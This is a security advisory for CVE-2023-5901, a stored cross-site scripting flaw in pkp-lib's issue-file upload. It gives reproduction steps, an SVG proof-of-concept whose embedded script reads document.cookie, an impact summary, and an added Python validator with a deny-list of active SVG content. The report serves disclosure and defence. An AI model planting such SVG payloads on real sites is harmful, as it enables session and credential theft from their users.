CVE-2023-5901: Cross-Site Scripting (XSS) via file upload in pkp-lib

Cross-site Scripting in GitHub repository pkp/pkp-lib prior to 3.3.0-16.

Description

I tested the demo site you provided. I see that there is a file upload vulnerability which can lead to XSS. Hope you check and find a solution as soon as possible.

Proof of Concept

Link to video PoC:

https://drive.google.com/file/d/1LAcTulbfhGJfCmWdIel9e-Sk__uoQbDq/view?usp=sharing

Steps

1. Log in with the demo account

2. Access the issues module

3. Then create an issue

4. Upload an SVG file with the following content:

    <svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
        <polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
        <script type="text/javascript">
            alert(document.cookie);
        </script>
    </svg>

5. Save the issue and access the newly created issue, then access the just-uploaded SVG file and the payload will be executed.

Impact

XSS (Cross-Site Scripting) is a type of web security vulnerability caused by improper input validation and inadequate data sanitization in a web application. It occurs when an attacker injects malicious scripts (usually in the form of HTML or JavaScript) into a website’s database or storage, which is then fetched and displayed to unsuspecting users. These scripts are executed in the browsers of those who visit the infected page, enabling the attacker to steal sensitive information, such as login credentials or personal data, and potentially take control of the user’s account or perform malicious actions on their behalf. To prevent stored XSS, developers must implement proper input validation and output encoding to ensure that user-supplied data is treated as plain text and not executed as code on the web page.
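
The following is an added example, not part of the original report and not pkp-lib's own code or fix: a Python upload check that flags SVG files carrying active content such as the `<script>` element from step 4. The function name `check_svg_upload`, the `UnsafeSvg` exception and the deny-list of elements and attributes are assumptions chosen for illustration.

```python
import xml.parsers.expat as expat

# Assumed deny-list for illustration; not pkp-lib's own validation logic.
ACTIVE_ELEMENTS = {"script", "foreignobject", "iframe", "embed", "object"}
URL_ATTRS = {"href", "src", "to", "from", "values"}

# The SVG from step 4 of the report, and a constructed harmless one.
REPORT_SVG = b"""<svg version="1.1" baseProfile="full" xmlns="http://www.w3.org/2000/svg">
<polygon id="triangle" points="0,0 0,50 50,0" fill="#009900" stroke="#004400"/>
<script type="text/javascript">alert(document.cookie);</script>
</svg>"""
CLEAN_SVG = b'<svg xmlns="http://www.w3.org/2000/svg"><rect width="5" height="5"/></svg>'

class UnsafeSvg(Exception):
    """Raised for DTDs or malformed XML, which are rejected outright."""

def _local(name):
    # With namespace_separator=" ", expat reports names as "<ns-uri> <local>".
    return name.rsplit(" ", 1)[-1].lower()

def check_svg_upload(data: bytes) -> list:
    """Return findings; an empty list means no active content was seen."""
    findings = []

    def on_start(name, attrs):
        tag = _local(name)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"element <{tag}>")
        for raw_attr, value in attrs.items():
            attr = _local(raw_attr)
            if attr.startswith("on"):
                findings.append(f"event handler {attr} on <{tag}>")
            # Browsers ignore whitespace and control characters in the scheme.
            compact = "".join(c for c in value if c > " ").lower()
            if attr in URL_ATTRS and "javascript:" in compact:
                findings.append(f"javascript: URL in {attr} on <{tag}>")

    def on_doctype(*_args):
        raise UnsafeSvg("DOCTYPE not allowed")  # blocks entity-based tricks

    parser = expat.ParserCreate(namespace_separator=" ")
    parser.StartElementHandler = on_start
    parser.StartDoctypeDeclHandler = on_doctype
    try:
        parser.Parse(data, True)
    except expat.ExpatError as exc:
        raise UnsafeSvg(f"not well-formed XML: {exc}") from exc
    return findings

if __name__ == "__main__":
    print(check_svg_upload(REPORT_SVG), check_svg_upload(CLEAN_SVG))
```

A deny-list like this is only a screening step. Serving uploaded files with `Content-Disposition: attachment`, or with a `Content-Security-Policy` response header that forbids script execution, limits what a missed payload can do.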
